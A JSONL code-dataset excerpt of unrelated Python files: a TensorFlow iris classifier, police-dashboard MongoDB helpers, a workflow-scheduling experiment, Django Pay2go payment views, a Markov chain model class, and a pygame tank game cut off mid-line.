uploading image: {}\".format(e.message))\r\n sys.exit(1)\r\n\r\nif __name__ == \"__main__\":\r\n InspiroBot()","sub_path":"InspiroBot.py","file_name":"InspiroBot.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158466601","text":"import tensorflow as tf\nimport pandas as pd\nimport argparse\n\nTRAIN_URL = \"http://download.tensorflow.org/data/iris_training.csv\"\nTEST_URL = \"http://download.tensorflow.org/data/iris_test.csv\"\n\nCSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',\n 'PetalLength', 'PetalWidth', 'Species']\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--train_steps', default=100, type=int,\n help='number of training steps')\n\ndef main(argv):\n args = parser.parse_args(argv[1:])\n \n my_checkpointing_config = tf.estimator.RunConfig(\n save_checkpoints_secs = 20*60,\n keep_checkpoint_max = 10\n )\n\n\n\n def load_data(label_name='Species'):\n train_path= tf.keras.utils.get_file(fname=TRAIN_URL.split('/')[-1], \n origin=TRAIN_URL)\n train = pd.read_csv(filepath_or_buffer=train_path, \n names=CSV_COLUMN_NAMES,\n header=0\n )\n\n train_features, train_label = train, train.pop(label_name)\n \n test_path = tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_features, test_label = test, test.pop(label_name)\n\n # Return four DataFrames.\n return (train_features, train_label), (test_features, test_label)\n\n def train_input_fn(features, labels, batch_size):\n dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))\n dataset = dataset.shuffle(buffer_size=1000).repeat(count=None).batch(batch_size)\n return dataset.make_one_shot_iterator().get_next()\n\n def eval_input_fn(features, labels=None, batch_size=None):\n \"\"\"An input function for evaluation or prediction\"\"\"\n if labels is None:\n inputs = features\n else:\n inputs = (dict(features), labels)\n \n dataset = tf.data.Dataset.from_tensor_slices(inputs)\n\n assert batch_size is not None, \"batch_size must not be None\"\n dataset = dataset.batch(batch_size)\n \n return dataset.make_one_shot_iterator().get_next()\n \n (train_feature, train_label), (test_feature, test_label) = load_data()\n\n my_feature_columns = []\n\n for key in train_feature.keys():\n my_feature_columns.append(tf.feature_column.numeric_column(key=key))\n\n classifier = tf.estimator.DNNClassifier(\n feature_columns=my_feature_columns,\n hidden_units=[10,10],\n n_classes=3,\n model_dir='models/premade_estimator',\n config=my_checkpointing_config)\n\n classifier.train(\n input_fn=lambda:train_input_fn(train_feature, train_label, args.batch_size),\n steps= args.train_steps)\n eval_result = classifier.evaluate(\n input_fn=lambda:eval_input_fn(test_feature, test_label, args.batch_size))\n\n print(\"\\nTest set accuracy: {accuracy:0.3f}\\n\".format(**eval_result))\n\nif __name__== '__main__':\n tf.logging.set_verbosity(tf.logging.INFO)\n tf.app.run(main)\n","sub_path":"estimators_beginner_wcp.py","file_name":"estimators_beginner_wcp.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341223725","text":"import os\nimport pymongo\nfrom os.path import isfile, join\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# All_handles={\n# \t\"blrcitypolice\":[\"Bangalore City Police\",\"BlrCityPolice\",\"464946996873402\"],\n# \t\"BangaloreTrafficPolice\":[\"Bangalore Traffic Police\",\"blrcitytraffic\",\"147207215344994\"],\n# \t\"GurgaonPolice\":[\"Gurgaon Police\",\"gurgaonpolice1\",\"357011041078922\"],\n# \t\"gnrpolice\":[\"Gandhinagar Police\",\"GnrPolice\",\"182415085299685\"],\n# \t\"hyderabadpolice\":[\"Hyderabad City Police\",\"hydcitypolice\",\"326762537496491\"],\n# \t\"HYDTP\":[\"Hyderabad Traffic Police\",\"HYDTraffic\",\"103022096427538\"],\n# \t\"SikkimPolice\":[\"Sikkim Police\",\"sikkimpolice\",\"348545705193638\"],\n# \t\"Chennai.Police\":[\"Chennai City Police\",\"chennaipolice_\",\"457621584324537\"],\n# \t\"chennaitrafficpolice\":[\"Chennai Traffic Police\",\"cctpolice\",\"141144945912047\"],\n# \t\"dcpnorth\":[\"Delhi Police DCP North\",\"DcpNorthDelhi\",\"408718049271221\"],\n# \t\"AhmedabadTrafficPolice\":[\"Ahmedabad Traffic Police\",\"AhdTraffic\",\"125541044208873\"],\n# \t\"keralatrafficpolice\":[\"Kerela Traffic Police\",\"keralatraffic\",\"837606212949358\"],\n# \t\"UpPolicePr\":[\"UP Police PR\",\"uppolicepr\",\"127726260748187\"],\n# \t\"rohtakrange\":[\"Rohtak Police\",\"RohtakPolice\",\"294138767359123\"],\n# \t\"PoliceCommissionerateFaridabad\":[\"Faridabad Police\",\"CPFbd\",\"497268597013510\"]\n# }\n\ndef getAllHandles():\n\tclient = pymongo.MongoClient()\n\tdb = client.FBPoliceData\n\tpage_info=db.page_names.find()\n\tAll_handles={}\n\tfor pi in page_info:\n\t\tj=db.page_fields.find_one({\"page\":pi[\"page\"]})\n\t\tif j is None:\n\t\t\tcontinue\n\t\tif \"id\" in j.keys():\n\t\t\tAll_handles[pi[\"page\"]]=[pi[\"name\"],pi[\"handle\"],j[\"id\"]]\n\treturn All_handles\n\ndef getId(handle):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\treturn All_handles[handle][2]\n\ndef getTitle(handle,platform):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\treturn (All_handles[handle][0],All_handles[handle][1])\n\ndef getComparisons(handle,platform):\n\thandle=handle.encode('utf8')\n\tAll_handles=getAllHandles()\n\thandles=All_handles\n\t# print All_handles.keys()\n\toutput_handles={}\n\tfor key in handles.keys():\n\t\tif key!=handle:\n\t\t\toutput_handles[key]=handles[key];\n\n\tif platform==\"twitter\":\n\t\treturn getTwitterTitles(handles)\n\treturn sortHandles(output_handles)\n\ndef getKeywords(keyword):\n\tkeywords=[\"worried\",\"why\",\"want\",\"need\",\"how can\",\"where\",\"fear\",\"trouble\",\"notice of\",\"issue\"]\n\tkeywords.remove(keyword)\n\treturn keywords\n\ndef getTwitterTitles(handles):\n\toutput_handles={}\n\tfor key in handles.keys():\n\t\tif handles[key][1]!=\"\":\n\t\t\toutput_handles[key]=handles[key];\n\treturn sortHandles(output_handles)\n\ndef sortHandles(handles_dict):\n\thandles_list=[]\n\tfor key in handles_dict.keys():\n\t\tdatum={}\n\t\tdatum[\"key\"]=key\n\t\tdatum[\"name\"]=handles_dict[key][0]\n\t\tdatum[\"tw_handle\"]=handles_dict[key][1]\n\t\tdatum[\"fb_id\"]=handles_dict[key][2]\n\t\thandles_list.append(datum)\n\n\tsorted_handles_list = sorted(handles_list, key=lambda k: k['name'])\n\n\treturn sorted_handles_list","sub_path":"police_dashboard/tool/functions/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"627982534","text":"import functools\nimport json\nimport os\nimport numpy\n\nfrom heft.algs.ga.GAImplementation.GARunner import MixRunner\nfrom heft.algs.heft.DSimpleHeft import run_heft\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager\nfrom heft.core.environment.Utility import wf, Utility\nfrom heft.experiments.cga.mobjective.utility import SimpleTimeCostEstimator\nfrom heft.experiments.cga.utilities.common import UniqueNameSaver, repeat\nfrom heft.core.environment.ResourceGenerator import ResourceGenerator as rg\n\n\nwf_names = ['Montage_75']\n# wf_names = ['Montage_50']\n# wf_names = ['Montage_500']\n# wf_names = ['CyberShake_100']\n# wf_names = ['Epigenomics_100']\n# wf_names = [\"CyberShake_50\"]\n\nonly_heft = False\n\nPARAMS = {\n \"ideal_flops\": 20,\n \"is_silent\": False,\n \"is_visualized\": False,\n \"ga_params\": {\n \"Kbest\": 5,\n \"population\": 50,\n \"crossover_probability\": 0.3, #0.8\n \"replacing_mutation_probability\": 0.1, #0.5\n \"sweep_mutation_probability\": 0.3, #0.4\n \"generations\": 100\n },\n \"nodes_conf\": [10, 15, 25, 30],\n \"transfer_time\": 100,\n \"heft_initial\": False\n}\n\nrun = functools.partial(MixRunner(), **PARAMS)\ndirectory = \"../../temp/ga_vs_heft_exp\"\nsaver = UniqueNameSaver(\"../../temp/ga_vs_heft_exp\")\n\n# def do_exp():\n# ga_makespan, heft_makespan, ga_schedule, heft_schedule = run(wf_names[0])\n# saver(ga_makespan)\n# return ga_makespan\n\ndef do_exp_schedule(takeHeftSchedule=True):\n saver = UniqueNameSaver(\"../../temp/ga_vs_heft_exp_heft_schedule\")\n\n ga_makespan, heft_makespan, ga_schedule, heft_schedule = run(wf_names[0])\n\n ## TODO: pure hack\n\n schedule = heft_schedule if takeHeftSchedule else ga_schedule\n\n mapping = [(item.job.id, node.flops) for node, items in schedule.mapping.items() for item in items]\n mapping = sorted(mapping, key=lambda x: x[0])\n\n ordering = [(item.job.id, item.start_time) for node, items in heft_schedule.mapping.items() for item in items]\n ordering = [t for t, time in sorted(ordering, key=lambda x: x[1])]\n\n data = {\n \"mapping\": mapping,\n \"ordering\": ordering\n }\n\n name = saver(data)\n return ga_makespan, heft_makespan, ga_schedule, heft_schedule, name\n\ndef do_exp_heft_schedule():\n res = do_exp_schedule(True)\n return res[0]\n\ndef do_exp_ga_schedule():\n res = do_exp_schedule(False)\n return (res[0], res[4])\n\n\nif __name__ == '__main__':\n print(\"Population size: \" + str(PARAMS[\"ga_params\"][\"population\"]))\n\n _wf = wf(wf_names[0])\n rm = ExperimentResourceManager(rg.r(PARAMS[\"nodes_conf\"]))\n estimator = SimpleTimeCostEstimator(comp_time_cost=0, transf_time_cost=0, transferMx=None,\n ideal_flops=PARAMS[\"ideal_flops\"], transfer_time=PARAMS[\"transfer_time\"])\n\n heft_schedule = run_heft(_wf, rm, estimator)\n heft_makespan = Utility.makespan(heft_schedule)\n overall_transfer = Utility.overall_transfer_time(heft_schedule, _wf, estimator)\n overall_execution = Utility.overall_execution_time(heft_schedule)\n\n print(\"Heft makespan: {0}, Overall transfer time: {1}, Overall execution time: {2}\".format(heft_makespan,\n overall_transfer,\n overall_execution))\n\n if not only_heft:\n result = repeat(do_exp_heft_schedule, 10)\n mean = numpy.mean(result)\n #profit = (1 - mean / heft_makespan) * 100\n print(result)\n print(\"Heft makespan: {0}, Overall transfer time: {1}, Overall execution time: {2}\".format(heft_makespan,\n overall_transfer,\n overall_execution))\n print(\"Mean: {0}\".format(mean))\n #print(\"Profit: {0}\".format(profit))\n\n\n","sub_path":"heft/experiments/comparison_experiments/GAvsHEFT.py","file_name":"GAvsHEFT.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"168556122","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render, HttpResponse,redirect\nfrom .forms import BuyForm, SettingForm, NotifyUrlResponse, CustomerUrlResponse\nimport hashlib\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime, timedelta\nfrom .setting import setting \n\n\ndef time():\n return datetime.now()+ timedelta(hours=8)\n\ndef SettingView(request):\n template = 'pay2go/setting.html'\n \n if request.method==\"GET\":\n db = setting()\n db.get()\n context = {}\n context['form'] = SettingForm(initial={\"memberID\":db.memberID, \"hashKEY\":db.hashKEY, \"hashIV\":db.hashIV, \"enable\":db.enable})\n context['date'] = db.date if db.date else \"無\"\n return render(request, template, context)\n \n form = SettingForm(request.POST)\n if form.is_valid():\n memberID = form.cleaned_data['memberID']\n hashKEY = form.cleaned_data['hashKEY']\n hashIV = form.cleaned_data['hashIV']\n enable = form.cleaned_data['enable']\n setting().update(memberID, hashKEY, hashIV, enable, datetime.strftime(time(), '%Y/%m/%d %H:%M:%S'))\n return redirect(reverse(\"pay2go:setting\"))\n \n return render(request, template, {\"form\":form})\n\n@csrf_exempt\ndef NotifyURL(request):\n if request.method==\"POST\":\n form = NotifyUrlResponse(request.POST)\n if form.is_valid():\n MerchantID = form.cleaned_data['MerchantID']\n Amt = form.cleaned_data['Amt']\n MerchantOrderNo = form.cleaned_data['MerchantOrderNo']\n TradeNo = form.cleaned_data['TradeNo']\n if CheckCode(Amt, MerchantOrderNo, TradeNo)==form.cleaned_data['CheckCode']:\n form.save()\n return HttpResponse()\n\ndef CheckCode(MerchantID, Amt, MerchantOrderNo, TradeNo):\n db = setting()\n db.get()\n CheckValue = \"HashIV=\" + db.hashIV\n CheckValue+= \"&Amt=\" + str(Amt)\n CheckValue+= \"&MerchantID=\" + MerchantID\n CheckValue+= \"&MerchantOrderNo=\" + MerchantOrderNo\n CheckValue+= \"&TradeNo=\" + TradeNo\n CheckValue+= \"&HashKey=\" + db.hashKEY\n \n hash_object = hashlib.sha256(CheckValue)\n hex_dig = hash_object.hexdigest()\n return hex_dig.upper()\n\n@csrf_exempt\ndef CustomerURL(request):\n if request.method==\"POST\":\n form = CustomerUrlResponse(request.POST)\n if form.is_valid():\n form.save()\n #data = getDATA(request.POST)\n return HttpResponse()\n\n@csrf_exempt\ndef main(request):\n template = 'pay2go/main.html'\n return render(request, template, {})\n\ndef buy(request):\n template = 'pay2go/buy.html'\n context = {}\n context['datetime']= datetime.strftime(time(), '%Y%m%d %H:%M:%S')\n context['form'] = BuyForm()\n return render(request, template, context )\n\ndef pay2go(request):\n template = 'pay2go/pay2go.html'\n \n if request.method==\"GET\":\n return render(request, template, {})\n \n form = BuyForm(request.POST)\n\n \n if not form.is_valid():\n return render(request, template, {})\n \n MerchantOrderNo = \"TESTNUMBER\" + form.cleaned_data['OrderNumber']\n Amt = form.cleaned_data['cost']\n Email = form.cleaned_data['email']\n ItemDesc = \"測試物品\"\n data = BuyData(MerchantOrderNo, Amt, Email, ItemDesc)\n data.host = request.META['HTTP_HOST']\n return render(request, template, {\"BuyData\":data})\n \n \nclass BuyData:\n def __init__(self, MerchantOrderNo, Amt, Email, ItemDesc):\n self.getDB()\n TimeStamp = datetime.strftime(time(), '%Y%m%d')\n \n self.MerchantID = self.memberID\n self.RespondType = \"String\"\n self.TimeStamp = TimeStamp\n self.Version = \"1.1\"\n self.MerchantOrderNo = MerchantOrderNo\n self.Amt = Amt\n self.ItemDesc = ItemDesc\n self.ExpireDate = \"\"\n self.ReturnURL = \"\"\n self.NotifyURL = \"https://phlipb-tw.appspot.com/pay2go/NotifyURL\"\n self.CustomerURL = \"https://phlipb-tw.appspot.com/pay2go/CustomerURL\"\n self.Email = Email\n self.LoginType = \"0\"\n self.CREDIT = \"0\"\n \n self.CheckValue = self.CreateCheckCode(Amt, MerchantOrderNo, TimeStamp)\n \n def getDB(self):\n db = setting()\n db.get()\n self.memberID = db.memberID\n self.hashKEY = db.hashKEY\n self.hashIV = db.hashIV\n self.enable = db.getEnable()\n \n def CreateCheckCode(self, Amt, MerchantOrderNo, TimeStamp):\n CheckValue = \"HashKey=\" + self.hashKEY\n CheckValue+= \"&Amt=\" + Amt\n CheckValue+= \"&MerchantID=\" + self.memberID\n CheckValue+= \"&MerchantOrderNo=\" + MerchantOrderNo\n CheckValue+= \"&TimeStamp=\" + TimeStamp\n CheckValue+= \"&Version=\" + self.Version\n CheckValue+= \"&HashIV=\" + self.hashIV\n hash_object = hashlib.sha256(CheckValue)\n hex_dig = hash_object.hexdigest()\n return hex_dig.upper()\n","sub_path":"test/pay2go/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"137093473","text":"import torch\nimport torch.nn as nn\nimport torch.distributions as dist\nfrom torch.nn.utils.rnn import PackedSequence, pack_sequence\nimport pyblaze.nn as xnn\nfrom pycave.bayes._internal.utils import power_iteration\nfrom .engine import MarkovModelEngine\n\nclass MarkovModel(xnn.Estimator, nn.Module):\n \"\"\"\n The MarkovModel models a simple MarkovChain with a fixed set of states. You may use this class\n whenever states are known and transition probabilities are the only quantity of interest. In\n case of any additional output from the states, consider using the `HMM` model.\n\n In addition to the methods documented below, the Markov model provides the following methods\n as provided by the `estimator mixin `_.\n\n `fit(...)`\n Optimizes the model's parameters.\n\n `evaluate(...)`\n Computes the per-datapoint negative log-likelihood of the given data.\n\n `predict(...)`\n Not available.\n\n The parameters that may be passed to the functions can be derived from the\n `engine documentation `_. The data needs, however, not be passed as a\n PyTorch data loader but all methods also accept the following instead:\n\n * A single packed sequence\n * A single 2-D tensor (interpreted as batch of sequences)\n * A list of packed sequences\n * A list of 2-D tensors (interpreted as batches of sequences)\n\n Additionally, the methods allow the following keyword arguments:\n\n `fit(...)`\n * symmetric: bool, default: False\n Whether a symmetric transition matrix should be learnt from the data (e.g. useful when\n training on random walks from an undirected graph).\n * teleport_alpha: float, default: 0\n The probability of random teleportations from one state to a randomly selected other one\n upon every transition. Generally \"spaces out\" probabilities in the transition\n probability matrix.\n \"\"\"\n\n @property\n def engine(self):\n return MarkovModelEngine(self)\n\n def __init__(self, num_states):\n \"\"\"\n Initializes a new Markov model.\n\n Parameters\n ----------\n num_states: int\n The number of states in the Markov model.\n \"\"\"\n super().__init__()\n\n self.num_states = num_states\n\n self.initial_probs = nn.Parameter(\n torch.empty(self.num_states), requires_grad=False\n )\n self.transition_probs = nn.Parameter(\n torch.empty(self.num_states, self.num_states), requires_grad=False\n )\n\n self.reset_parameters()\n\n def reset_parameters(self):\n \"\"\"\n Resets the parameter of the model by sampling initial probabilities as well as transition\n probabilities from a uniform distribution.\n \"\"\"\n # 1) Initial Probabilities\n self.initial_probs.uniform_()\n self.initial_probs /= self.initial_probs.sum()\n\n # 2) Transition Probabilities\n self.transition_probs.uniform_()\n self.transition_probs /= self.transition_probs.sum(1, keepdim=True)\n\n def forward(self, data):\n \"\"\"\n Runs inference for a single packed sequence, i.e. computes the negative log-likelihood of\n the given sequences.\n\n Parameters\n ----------\n data: torch.PackedSequence [N]\n The sequences for which to compute the negative log-likelihood (number of items N).\n\n Returns\n -------\n torch.Tensor [1]\n The negative log-likelihood.\n \"\"\"\n num_sequences = data.batch_sizes[0].item()\n\n # 1) Get probabilities of first sequence values\n log_likeli = self.initial_probs[data.data[:num_sequences]].log()\n offset = num_sequences\n\n # 2) Iterate over transitions\n for prev_size, size in zip(data.batch_sizes, data.batch_sizes[1:]):\n source = data.data[offset-prev_size: offset-prev_size+size]\n target = data.data[offset: offset+size]\n log_likeli[:size] += self.transition_probs[source, target].log()\n offset += size\n\n # 3) Compute final negative log-likelihood\n return -log_likeli.logsumexp(-1).sum()\n\n def sample(self, num_sequences, sequence_length):\n \"\"\"\n Samples the given number of sequences with the given length from the model's underlying\n probability distribution.\n\n Parameters\n ----------\n num_sequences: int\n The number of sequences to sample.\n sequence_length: int\n The length of the sequences to sample. Generation tends to be much slower for longer\n sequences compared to a higher number of sequences. The reason is that generation of\n sequences needs to be iterative.\n\n Returns\n -------\n torch.Tensor [N, S]\n The state sequences (number of sequences N, sequence length S).\n \"\"\"\n samples = torch.empty(num_sequences, sequence_length, dtype=torch.long)\n\n # 1) Initialize initial states\n samples[:, 0] = self._sample_initial_states(num_sequences)\n\n # 2) Now sample the sequences\n for i in range(1, sequence_length):\n generator = dist.Categorical(self.transition_probs[samples[:, i-1]])\n samples[:, i] = generator.sample()\n\n return samples\n\n def stationary_distribution(self, max_iterations=100):\n \"\"\"\n Computes the stationary distribution of the Markov chain. This equals the eigenvector\n corresponding to the largest eigenvalue of the transposed transition matrix.\n\n Parameters\n ----------\n max_iterations: int, default: 100\n The number of iterations to perform for the power iteration.\n\n Returns\n -------\n torch.Tensor [N]\n The probability of a random walker visiting each of the states after infinitely many\n steps.\n \"\"\"\n return power_iteration(self.transition_probs.t(), max_iterations=max_iterations)\n\n def prepare_input(self, data):\n if isinstance(data, PackedSequence):\n return [data]\n if isinstance(data, torch.Tensor):\n return [pack_sequence(data)]\n if isinstance(data, (list, tuple)) and isinstance(data[0], torch.Tensor):\n return [pack_sequence(d) for d in data]\n return data\n\n def _sample_initial_states(self, num_samples):\n generator = dist.Categorical(self.initial_probs)\n return generator.sample((num_samples,))\n\n def __repr__(self):\n return f'{self.__class__.__name__}(num_states={self.num_states})'\n","sub_path":"pycave/bayes/markov/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362243430","text":"'''\r\nNew Function: My bullet hit enemy tank, using Sprite module\r\nReference: www.pygame.org\r\n'''\r\n\r\nimport pygame, time, nprandom\r\nfrom pygame.sprite import Sprite\r\n\r\nSCREEN_WIDTH = 700\r\nSCREEN_HEIGHT = 500\r\nBGCOLOR = pygame.Color(0,0,0)\r\nFONT_COLOR = pygame.Color(255,0,0)\r\nTANK_SPEED = 3\r\nENEMY_TANK_SPEED = [1,2,3,4,5]\r\nENEMY_TANK_COUNT = 4\r\nENEMY_TANK_STEP = 50\r\nBULLET_SPEED = 6\r\nMAX_BULLET_NUM = 3\r\n\r\nclass BaseSprite(Sprite):\r\n def __init__(self, color, width, height):\r\n # Call the parent class (Sprite) constructor\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\nclass MainGame():\r\n window = None\r\n myTank = None\r\n enemyTanksList = []\r\n myBulletsList = []\r\n enemyBulletsList = []\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def startGame(self):\r\n #init main window\r\n pygame.display.init()\r\n #set width and height\r\n MainGame.window = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\r\n # set window title\r\n pygame.display.set_caption(\"TankWar\")\r\n # init my tank\r\n MainGame.myTank = MyTank(350, 250)\r\n # init enemy tanks\r\n self.initEnemyTanks()\r\n # init my bullets has been done in KEY_DOWN\r\n # self.initMyBullets()\r\n # show the window\r\n while True:\r\n # set the update time\r\n time.sleep(0.02)\r\n # set bg color\r\n MainGame.window.fill(BGCOLOR)\r\n # draw new surface to window surface\r\n MainGame.window.blit(self.getFontSurface(\"Remain Enemies:{0}\".format(len(MainGame.enemyTanksList))), (10,10))\r\n # display the tank\r\n MainGame.myTank.displayTank()\r\n self.displayEnemyTank()\r\n # display the my bullets\r\n self.displayMyBullets()\r\n # display enemy bullets\r\n self.displayEnemyBullets()\r\n # record the events\r\n self.getEvent()\r\n # control the movement of my tank\r\n if MainGame.myTank.movement:\r\n MainGame.myTank.move()\r\n # update the screen\r\n pygame.display.update()\r\n\r\n def displayEnemyBullets(self):\r\n for enemyBullet in MainGame.enemyBulletsList:\r\n if enemyBullet.alive:\r\n enemyBullet.displayBullet()\r\n enemyBullet.move()\r\n else:\r\n MainGame.enemyBulletsList.remove(enemyBullet)\r\n\r\n def displayMyBullets(self):\r\n for bullet in MainGame.myBulletsList:\r\n if bullet.alive:\r\n bullet.displayBullet()\r\n bullet.move()\r\n bullet.hitEnemyTank()\r\n else:\r\n MainGame.myBulletsList.remove(bullet)\r\n\r\n def displayEnemyTank(self):\r\n for enemyTank in MainGame.enemyTanksList:\r\n if enemyTank.alive:\r\n enemyTank.displayTank()\r\n enemyTank.randMove()\r\n enemyBullet = enemyTank.shoot()\r\n if enemyBullet:\r\n MainGame.enemyBulletsList.append(enemyBullet)\r\n else:\r\n MainGame.enemyTanksList.remove(enemyTank)\r\n\r\n def initEnemyTanks(self):\r\n top = 100\r\n # loop to create enemy tanks\r\n for i in range(ENEMY_TANK_COUNT):\r\n left = nprandom.randint(0, 600)\r\n speed = nprandom.randint(1, 4)\r\n enemyTank = EnemyTank(top, left, speed)\r\n MainGame.enemyTanksList.append(enemyTank)\r\n\r\n def quitGame(self):\r\n print(\"successful quit!\")\r\n exit()\r\n\r\n def getFontSurface(self,text):\r\n # init the font module\r\n pygame.font.init()\r\n # show the fonts' names\r\n # print(pygame.font.get_fonts())\r\n # get a font object\r\n font = pygame.font.SysFont(\"consolas\", 18)\r\n # draw text on a new surface\r\n textSurface = font.render(text, True, FONT_COLOR)\r\n # return textsurface\r\n return textSurface\r\n\r\n def getEvent(self):\r\n # record the events\r\n eventList = pygame.event.get()\r\n # loop the events and do reaction\r\n for event in eventList:\r\n # if click \"close\" button\r\n if event.type == pygame.QUIT:\r\n self.quitGame()\r\n # if click keyboard\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n MainGame.myTank.direction = 'L'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_RIGHT:\r\n MainGame.myTank.direction = 'R'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_UP:\r\n MainGame.myTank.direction = 'U'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_DOWN:\r\n MainGame.myTank.direction = 'D'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_SPACE:\r\n # init a bullet while push K_SPACE\r\n if len(MainGame.myBulletsList) < MAX_BULLET_NUM:\r\n myBullet = Bullet(MainGame.myTank)\r\n MainGame.myBulletsList.append(myBullet)\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT or event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n MainGame.myTank.movement = False\r\n\r\nclass Tank():\r\n def __init__(self):\r\n super().__init__()\r\n self.direction = 'U'\r\n self.speed = TANK_SPEED\r\n self.alive = True\r\n self.myTanksImgs = {\r\n 'U': pygame.image.load('img/mytankU.gif'),\r\n 'R': pygame.image.load('img/mytankR.gif'),\r\n 'D': pygame.image.load('img/mytankD.gif'),\r\n 'L': pygame.image.load('img/mytankL.gif')\r\n }\r\n self.enemyTanksImgs = {\r\n 'U': pygame.image.load('img/enemyU.gif'),\r\n 'R': pygame.image.load('img/enemyR.gif'),\r\n 'D': pygame.image.load('img/enemyD.gif'),\r\n 'L': pygame.image.load('img/enemyL.gif')\r\n }\r\n\r\nclass MyTank(Tank):\r\n # init my tank and set the position of the tank\r\n def __init__(self, left, top):\r\n super().__init__()\r\n # get my tank surface according to the direction\r\n self.myTank = self.myTanksImgs.get(self.direction)\r\n # get the rectangle of my tank\r\n self.rect = self.myTank.get_rect()\r\n self.rect.left = left\r\n self.rect.top = top\r\n # set a flag to control the continue movement\r\n self.movement = False\r\n\r\n # display the tank in the game window\r\n def displayTank(self):\r\n # get my tank surface\r\n self.myTank = self.myTanksImgs.get(self.direction)\r\n # display it\r\n MainGame.window.blit(self.myTank, self.rect)\r\n\r\n def move(self):\r\n # judging direction\r\n if self.direction == \"L\":\r\n self.rect.left -= self.speed\r\n if self.rect.left <= 0:\r\n self.rect.left = 0\r\n elif self.direction == \"R\":\r\n self.rect.left += self.speed\r\n if self.rect.left + self.rect.height >= SCREEN_WIDTH:\r\n self.rect.left = SCREEN_WIDTH - self.rect.height\r\n elif self.direction == \"U\":\r\n self.rect.top -= self.speed\r\n if self.rect.top <= 0:\r\n self.rect.top = 0\r\n elif self.direction == \"D\":\r\n self.rect.top += self.speed\r\n if self.rect.top + self.rect.height >= SCREEN_HEIGHT:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n\r\nclass EnemyTank(Tank):\r\n def __init__(self, top, left, speed):\r\n super().__init__()\r\n self.enemyTank = self.enemyTanksImgs.get(self.direction)\r\n self.direction = self.randDirection()\r\n self.rect = self.enemyTank.get_rect()\r\n self.speed = ENEMY_TANK_SPEED[nprandom.randint(0, 4)]\r\n self.rect.left = left\r\n self.rect.top = top\r\n self.movement = True\r\n self.step = ENEMY_TANK_STEP\r\n\r\n def randMove(self):\r\n if self.step <= 0:\r\n self.direction = self.randDirection()\r\n self.step = ENEMY_TANK_STEP\r\n else:\r\n self.step -= 1\r\n self.move()\r\n\r\n def move(self):\r\n # judging direction\r\n if self.direction == \"L\":\r\n self.rect.left -= self.speed\r\n if self.rect.left <= 0:\r\n self.rect.left = 0\r\n elif self.direction == \"R\":\r\n self.rect.left += self.speed\r\n if self.rect.left + self.rect.height >= SCREEN_WIDTH:\r\n self.rect.left = SCREEN_WIDTH - self.rect.height\r\n elif self.direction == \"U\":\r\n self.rect.top -= self.speed\r\n if self.rect.top <= 0:\r\n self.rect.top = 0\r\n elif self.direction == \"D\":\r\n self.rect.top += self.speed\r\n if self.rect.top + self.rect.height >= SCREEN_HEIGHT:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n\r\n def randDirection(self):\r\n num = nprandom.randint(1, 4)\r\n if num == 1:\r\n return 'U'\r\n elif num == 2:\r\n return 'D'\r\n elif num == 3:\r\n return 'L'\r\n elif num == 4:\r\n return 'R'\r\n\r\n def displayTank(self):\r\n # get my tank surface\r\n self.enemyTank = self.enemyTanksImgs.get(self.direction)\r\n # display it\r\n MainGame.window.blit(self.enemyTank, self.rect)\r\n\r\n def shoot(self):\r\n if nprandom.randint(1, 200) < 10:\r\n return Bullet(self)\r\n\r\nclass Bullet(Sprite):\r\n def __init__(self, tank):\r\n self.myBulletImg = pygame.image.load('img/bullet.gif')\r\n self.rect = self.myBulletImg.get_rect()\r\n self.direction = tank.direction\r\n self.speed = 6\r\n self.alive = True\r\n if self.direction == 'U':\r\n self.rect.left = tank.rect.left + tank.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top - self.rect.height\r\n elif self.direction == 'D':\r\n self.rect.left = tank.rect.left + tank.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top + tank.rect.height\r\n elif self.direction == 'L':\r\n self.rect.left = tank.rect.left - self.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top + tank.rect.width / 2 - self.rect.width / 